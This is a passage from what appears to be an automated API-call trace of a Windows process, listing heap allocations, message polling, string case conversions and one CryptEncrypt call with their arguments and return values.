hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0264.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0264.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0264.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0264.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0264.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0264.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0264.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0264.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0264.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0264.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0264.212] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.212] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0264.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0264.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0264.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0264.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0264.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0264.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0264.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0264.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0264.213] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.214] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0264.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0264.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0264.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0264.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0264.214] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.214] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.214] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0264.215] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0264.215] CharLowerBuffW (in: lpsz="byte[46120]", cchLength=0xb | out: lpsz="byte[46120]") returned 0xb [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0264.215] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0264.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0264.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0264.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0264.216] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0264.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0264.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0264.218] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0264.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0264.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0264.218] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.218] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0264.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0264.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0264.218] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0264.218] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.218] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.218] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0264.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0264.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0264.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0264.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0264.220] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0264.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0264.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.221] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24d96d8*, pdwDataLen=0x8bef68*=0xb424, dwBufLen=0xb428 | out: pbData=0x24d96d8*, pdwDataLen=0x8bef68*=0xb428) returned 1 [0264.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0264.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0264.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0264.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0264.222] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0264.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0264.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0264.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.222] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.222] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0264.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.223] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0264.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0264.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0264.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0264.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0264.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0264.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0264.225] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0264.225] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0264.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0264.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.226] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0264.226] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.226] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0264.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0264.226] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0264.226] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0264.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.226] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0264.226] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.227] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0264.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0264.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0264.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.227] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.227] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0264.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.227] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.227] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0264.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0264.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0264.228] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.228] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.228] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0264.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0264.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0264.228] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.228] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.228] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0264.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0264.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0264.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.232] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.232] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, 